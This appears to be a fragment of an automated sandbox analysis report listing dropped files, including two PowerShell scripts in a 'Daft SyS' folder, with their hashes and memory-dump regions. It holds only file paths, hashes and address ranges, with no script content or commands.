| SHA512 | 9f63413b1759b8c467a7aa146a12f709ce5a929a928f70ea00799b6246eab3d04afea884d78a87e23ab4cb5fcb8b51269d2a5221b0bb93f9cca7c3468d2359fe |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2b24af1492f112d2e53cb7415fda39f |
| SHA1 | dbfcee57242a14b60997bd03379cc60198976d85 |
| SHA256 | fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073 |
| SHA512 | 9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0 |
memory/2116-119-0x000001D01A1B0000-0x000001D01A1C8000-memory.dmp
memory/2116-120-0x000001D001780000-0x000001D001786000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Daft SyS\x2.ps1
| MD5 | 80cc1e9c5788aa32935547805c78f1cf |
| SHA1 | e31f8d4102408d01ac1b1fda23d9c8d26104f90f |
| SHA256 | 0bc10b9ab8808a6918d887094f418c68d48e5e26b4ad0f7144967f567033c84f |
| SHA512 | e68eb58226c4fc013ecbc64c092ba0941c99e1731f9a973805591bede7edc4e33aa1f820163da4a159434d831d9c218e791773a8cc231e7f0dc9c83cf4169a21 |
memory/4092-140-0x00007FF8EC490000-0x00007FF8EC4A0000-memory.dmp
memory/4092-139-0x00007FF8EC490000-0x00007FF8EC4A0000-memory.dmp
memory/4092-138-0x00007FF8EC490000-0x00007FF8EC4A0000-memory.dmp
memory/4092-137-0x00007FF8EC490000-0x00007FF8EC4A0000-memory.dmp
memory/4092-141-0x00007FF92C410000-0x00007FF92C605000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 53cbd2da07930d380c4e2c2ca9d44587 |
| SHA1 | d3e56b90c74a05b3bae9aeb3491281b7c5c144e7 |
| SHA256 | 3e569b6e77c987ba5b5483c83168358b7c4c2277a46dc7cd59af7c56a40d2253 |
| SHA512 | 9476048d43d5569a7698ae1d4f9ad836839f10ffd0242bd0b6ebed8a30392a2e2042ee16a61269cfdad118107c3cbb9fd9deb4f05e9ee37b339d958f3de0a43b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5387258bc776353faff8aa820a1ad8b9 |
| SHA1 | b20032fc6f28f044a54400ff6f05edf28456601e |
| SHA256 | fa6097f092dbbbf5b6655ad85b4bdbf427db7359430f846ad1795ee0fe94c9f9 |
| SHA512 | 116fcf0fee9d2b38e01f9b33b8e956c48997e60fb8a41a05314eaabd864f61962907ee231d8860cbaab3f5ad5fa6018036c53f77814cc950613ac46b2ed03e3c |
C:\Users\Admin\AppData\LocalLow\Daft SyS\skowf.ps1
| MD5 | c48ca9208d2d72f7c4aadc4552c4371c |
| SHA1 | 009a66081262d0e7ac6d9654f4d19ffe8f7b9965 |
| SHA256 | 488da21024f08719000d1c44b00bf74fa4343eb1cccffb786efac08cba079fd5 |
| SHA512 | 404b0062421b807cace5d4ab37b8379373045fe57bb3a020b98484b56adc1096c929319194f190edba247959a8dce7c6097b393d6a811e75941ff586e9ac71e0 |
memory/1164-160-0x00000264E9CE0000-0x00000264E9CEA000-memory.dmp
memory/2860-161-0x0000000000400000-0x000000000040A000-memory.dmp
memory/2860-163-0x0000000005E40000-0x00000000063E4000-memory.dmp